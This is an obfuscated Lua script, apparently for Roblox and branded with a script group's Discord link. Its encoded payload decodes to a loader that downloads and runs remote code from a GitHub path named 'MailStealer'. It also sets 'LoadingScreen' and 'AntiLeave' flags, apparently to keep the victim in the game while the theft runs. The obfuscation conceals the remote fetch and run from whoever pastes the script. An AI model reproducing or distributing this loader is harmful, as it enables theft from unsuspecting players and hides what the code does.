--[[

███████╗ ███████╗ ██╗   ██╗ ██╗   ██╗ ██╗  ██╗   ██████╗  █████╗  ██████╗  ██╗ ██████╗  ████████╗ ███████╗    
██╔════╝ ╚════██║ ╚██╗ ██╔╝ ╚██╗ ██╔╝ ██║ ██╔╝  ██╔════╝ ██╔══██╗ ██╔══██╗ ██║ ██╔══██╗ ╚══██╔══╝ ╚════██║
█████╗     ███╔═╝  ╚████╔╝   ╚████╔╝  █████═╝   ╚█████╗  ██║  ╚═╝ ██████╔╝ ██║ ██████╔╝    ██║      ███╔═╝
██╔══╝   ██╔══╝     ╚██╔╝     ╚██╔╝   ██╔═██╗    ╚═══██╗ ██║  ██╗ ██╔══██╗ ██║ ██╔═══╝     ██║    ██╔══╝  
███████╗ ███████╗    ██║       ██║    ██║ ╚██╗  ██████╔╝ ╚█████╔╝ ██║  ██║ ██║ ██║         ██║    ███████╗
╚══════╝ ╚══════╝    ╚═╝       ╚═╝    ╚═╝  ╚═╝  ╚═════╝   ╚════╝  ╚═╝  ╚═╝ ╚═╝ ╚═╝         ╚═╝    ╚══════╝
discord: https://discord.gg/eFq5FaC7g6

]]
do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v69=0;while true do if (v69==0) then v19=v0(v3(v30,1,1));return "";end end else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==0) then v72=(v31/((5 -3)^(v32-(1 -(0 -0)))))%((4 -2)^(((v33-1) -(v32-((1685 -(68 + 997)) -(555 + 64)))) + ((2202 -(226 + 1044)) -(857 + 74)))) ;return v72-(v72%(569 -(367 + 201))) ;end end else local v73=927 -(214 + 713) ;local v74;while true do if (v73==(0 + 0)) then v74=(1 + 1)^(v32-(878 -(282 + 595))) ;return (((v31%(v74 + v74))>=v74) and (1638 -(1523 + (496 -382)))) or (0 + 0) ;end end end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=117 -((58 -26) + 85) ;local v36;local v37;while true do if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 1 + 1 ;v35=958 -(892 + 65) ;end if (((352 -(87 + 263)) -1)==v35) then return (v37 * (472 -216)) + v36 ;end end end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;return (v41 * 16777216) + (v40 * (48056 + 17480)) + (v39 * 256) + v38 ;end local function v24()local v42=0 -(0 -0) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(954 -(802 + 150))) then v47=v20(v44,56 -35 ,55 -24 );v48=((v20(v44,24 + 8 )==(998 -(915 + 82))) and  -1) or (2 -1) ;v42=2 + 1 ;end if (v42==1) then v45=1;v46=(v20(v44,1 -0 ,1207 -(1069 + 118) ) * ((2 + 0)^(72 -40))) + v43 ;v42=3 -(3 -2) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=1 -(1486 -(998 + 488)) ;end if (v42==(3 + 0)) then if (v47==(791 -(368 + 135 + 288))) then if (v46==((0 + 0) -(0 -0))) then return v48 * (18 -(10 + (780 -(201 + 571)))) ;else v47=3 -2 ;v45=442 -((1275 -(814 + 45)) + 26) ;end elseif (v47==2047) then return ((v46==(0 -0)) and (v48 * ((1 + 0)/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(1461 -((1283 -(116 + 1022)) + 293)) ) * (v45 + (v46/((432 -(44 + 386))^52))) ;end end end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=v3(v16,v18,(v18 + v49) -(2 -1) );v18=v18 + v49 ;local v51={};for v67=1 + 0 , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=121 -(17 + 104) ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;while true do if (v52==(4 -1)) then v59=nil;while true do local v79=0;while true do if (v79==1) then if (v53==(0 + 0)) then local v101=0 + 0 ;while true do if (0==v101) then v54={};v55={};v101=1 -0 ;end if (v101==1) then v56={};v57={v54,v55,nil,v56};v101=1 + 1 ;end if (v101==2) then v53=1;break;end end end break;end if (v79==(0 -0)) then if ((1 -0)==v53) then v58=v23();v59={};for v103=1385 -(746 + 638) ,v58 do local v104=0;local v105;local v106;local v107;local v108;local v109;while true do if (v104~=(1 + 0)) then else v107=nil;v108=nil;v104=2;end if (v104==(0 -0)) then v105=341 -(218 + 123) ;v106=nil;v104=1;end if (v104~=2) then else v109=nil;while true do if (v105~=2) then else while true do if (v106~=(1581 -(1535 + 46))) then else local v178=0 + 0 ;while true do if ((0 + 0)~=v178) then else v107=0;v108=nil;v178=1;end if ((561 -(306 + 254))==v178) then v106=1;break;end end end if (v106==(1 + 0)) then v109=nil;while true do if (v107~=(1 -0)) then else if (v108==1) then v109=v21()~=(1467 -(899 + 568)) ;elseif (v108==2) then v109=v24();elseif (v108==(2 + 1)) then v109=v25();end v59[v103]=v109;break;end if (v107~=0) then else local v188=0;local v189;local v190;while true do if (v188==1) then while true do if (v189==0) then v190=0;while true do if (v190~=(0 -0)) then else local v199=0;local v200;while true do if (v199==(603 -(268 + 335))) then v200=290 -(60 + 230) ;while true do if (v200==0) then local v205=572 -(426 + 146) ;while true do if (v205==0) then v108=v21();v109=nil;v205=1 + 0 ;end if (v205~=1) then else v200=1;break;end end end if (1==v200) then v190=1457 -(282 + 1174) ;break;end end break;end end end if (v190==(812 -(569 + 242))) then v107=2 -1 ;break;end end break;end end break;end if (v188==0) then v189=0;v190=nil;v188=1;end end end end break;end end break;end if (v105~=(0 + 0)) then else local v157=1024 -(706 + 318) ;while true do if (1==v157) then v105=1252 -(721 + 530) ;break;end if (v157~=(1271 -(945 + 326))) then else v106=0 -0 ;v107=nil;v157=1;end end end if (v105==(1 + 0)) then local v158=0;while true do if (v158==(701 -(271 + 429))) then v105=2 + 0 ;break;end if (v158==0) then v108=nil;v109=nil;v158=1;end end end end break;end end end v57[1503 -(1408 + 92) ]=v21();v53=2;end if (v53~=(1088 -(461 + 625))) then else for v110=1289 -(993 + 295) ,v23() do local v111=0 + 0 ;local v112;local v113;local v114;while true do if (v111==1) then v114=nil;while true do if (v112~=1) then else while true do if (v113==(1171 -(418 + 753))) then v114=v21();if (v20(v114,1,1)==(0 + 0)) then local v181=0;local v182;local v183;local v184;local v185;local v186;while true do if (v181==1) then v184=nil;v185=nil;v181=2;end if (v181==(1 + 1)) then v186=nil;while true do if (v182~=(1 + 1)) then else while true do if (v183~=(1 + 1)) then else local v192=529 -(406 + 123) ;local v193;while true do if (v192~=0) then else v193=0;while true do if (v193~=(1770 -(1749 + 20))) then else v183=1 + 2 ;break;end if (v193~=(1322 -(1249 + 73))) then else local v204=0 + 0 ;while true do if (v204==(1145 -(466 + 679))) then if (v20(v185,2 -1 ,2 -1 )==(1901 -(106 + 1794))) then v186[1 + 1 ]=v59[v186[1 + 1 ]];end if (v20(v185,5 -3 ,5 -3 )==(115 -(4 + 110))) then v186[3]=v59[v186[587 -(57 + 527) ]];end v204=1;end if (v204==1) then v193=1;break;end end end end break;end end end if (v183~=(1427 -(41 + 1386))) then else local v194=103 -(17 + 86) ;while true do if (v194==0) then local v203=0 + 0 ;while true do if (0~=v203) then else v184=v20(v114,2,6 -3 );v185=v20(v114,11 -7 ,6);v203=167 -(122 + 44) ;end if ((1 -0)~=v203) then else v194=3 -2 ;break;end end end if (1==v194) then v183=1;break;end end end if (v183==(3 + 0)) then if (v20(v185,3,1 + 2 )==(1 -0)) then v186[4]=v59[v186[69 -(30 + 35) ]];end v54[v110]=v186;break;end if (v183==1) then local v196=0 + 0 ;local v197;local v198;while true do if (v196==0) then v197=0;v198=nil;v196=1258 -(1043 + 214) ;end if ((3 -2)~=v196) then else while true do if (v197==(1212 -(323 + 889))) then v198=0;while true do if (v198~=(0 -0)) then else local v206=0;while true do if (v206~=1) then else v198=581 -(361 + 219) ;break;end if (v206==0) then v186={v22(),v22(),nil,nil};if (v184==0) then local v211=982 -(18 + 964) ;local v212;while true do if (v211==(0 -0)) then v212=0;while true do if (v212==(0 + 0)) then v186[3]=v22();v186[3 + 1 ]=v22();break;end end break;end end elseif (v184==(851 -(20 + 830))) then v186[3]=v23();elseif (v184==(2 + 0)) then v186[3]=v23() -((128 -(116 + 10))^(2 + 14)) ;elseif (v184==3) then local v217=738 -(542 + 196) ;local v218;local v219;local v220;while true do if ((1 -0)==v217) then v220=nil;while true do if ((0 + 0)~=v218) then else local v221=0;while true do if (v221~=0) then else v219=0 + 0 ;v220=nil;v221=1 + 0 ;end if (v221==(2 -1)) then v218=1;break;end end end if (v218==(2 -1)) then while true do if (v219~=0) then else v220=0;while true do if (v220==(1551 -(1126 + 425))) then v186[408 -(118 + 287) ]=v23() -(2^16) ;v186[4]=v22();break;end end break;end end break;end end break;end if (v217~=0) then else v218=0 -0 ;v219=nil;v217=1;end end end v206=1122 -(118 + 1003) ;end end end if (v198==(2 -1)) then v183=2;break;end end break;end end break;end end end end break;end if (v182~=0) then else local v191=0;while true do if (v191==1) then v182=1;break;end if (v191==(377 -(142 + 235))) then v183=0 -0 ;v184=nil;v191=1;end end end if (v182~=(1 + 0)) then else v185=nil;v186=nil;v182=2;end end break;end if (v181==(977 -(553 + 424))) then v182=0;v183=nil;v181=1 -0 ;end end end break;end end break;end if ((0 + 0)==v112) then local v159=0 + 0 ;while true do if (v159==1) then v112=1;break;end if (0~=v159) then else v113=0 + 0 ;v114=nil;v159=1 + 0 ;end end end end break;end if (v111==(0 + 0)) then local v120=0;while true do if (1==v120) then v111=2 -1 ;break;end if (v120~=0) then else v112=0 -0 ;v113=nil;v120=1;end end end end end for v115=1,v23() do v55[v115-1 ]=v28();end return v57;end v79=1;end end end break;end if ((2 -1)~=v52) then else v55=nil;v56=nil;v52=2;end if (v52==(0 + 0)) then v53=0;v54=nil;v52=4 -3 ;end if (v52==(755 -(239 + 514))) then v57=nil;v58=nil;v52=3;end end end local function v29(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v80=v64;local v81=v65;local v82=v66;local v83=v27;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v94=0,v88 do if (v94>=v82) then v86[v94-v82 ]=v87[v94 + 1 ];else v90[v94]=v87[v94 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=5) then if (v93<=2) then if (v93<=0) then if (v90[v92[2]]==v92[4]) then v84=v84 + 1 ;else v84=v92[3];end elseif (v93>1) then local v122=v92[2];local v123=v90[v92[3]];v90[v122 + 1 ]=v123;v90[v122]=v123[v92[4]];else local v127=v92[2];v90[v127]=v90[v127](v13(v90,v127 + 1 ,v85));end elseif (v93<=3) then v90[v92[2]]();elseif (v93>4) then do return;end else v90[v92[2]]=v62[v92[3]];end elseif (v93<=8) then if (v93<=6) then v84=v92[3];elseif (v93==7) then local v131;local v132,v133;local v134;local v135;v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v92=v80[v84];v135=v92[2];v134=v90[v92[3]];v90[v135 + 1 ]=v134;v90[v135]=v134[v92[4]];v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v135=v92[2];v132,v133=v83(v90[v135](v13(v90,v135 + 1 ,v92[3])));v85=(v133 + v135) -1 ;v131=0;for v155=v135,v85 do local v156=0;while true do if (v156==0) then v131=v131 + 1 ;v90[v155]=v132[v131];break;end end end v84=v84 + 1 ;v92=v80[v84];v135=v92[2];v90[v135]=v90[v135](v13(v90,v135 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];v84=v92[3];else local v147=0;while true do if (v147==2) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v147=3;end if (v147==3) then v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v147=4;end if (v147==1) then v90[v92[2]]=v62[v92[3]];v84=v84 + 1 ;v92=v80[v84];v147=2;end if (v147==0) then v90[v92[2]][v92[3]]=v92[4];v84=v84 + 1 ;v92=v80[v84];v147=1;end if (v147==4) then v84=v92[3];break;end end end elseif (v93<=9) then v90[v92[2]][v92[3]]=v92[4];elseif (v93>10) then local v148=0;local v149;local v150;local v151;local v152;while true do if (v148==1) then v85=(v151 + v149) -1 ;v152=0;v148=2;end if (v148==2) then for v176=v149,v85 do local v177=0;while true do if (v177==0) then v152=v152 + 1 ;v90[v176]=v150[v152];break;end end end break;end if (v148==0) then v149=v92[2];v150,v151=v83(v90[v149](v13(v90,v149 + 1 ,v92[3])));v148=1;end end else v90[v92[2]]=v92[3];end v84=v84 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0C3O00028O00026O00F03F03023O005F4703093O004D6F7573654C6F636B2O01030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F457A2O796B735363726970747A2F4D61696C537465616C65722F6D61696E2F4D61696C537465616C6572030D3O004C6F6164696E675363722O656E03093O00416E74694C65617665012O00163O00120A3O00013O00264O000D000100020004063O000D0001001204000100033O00300700010004000500122O000100063O00122O000200073O00202O00020002000800122O000400096O000200046O00013O00024O00010001000100044O0015000100264O0001000100010004063O00010001001204000100033O0030080001000A000500122O000100033O00302O0001000B000C00124O00023O00044O000100012O00053O00017O00",v9(),...);end
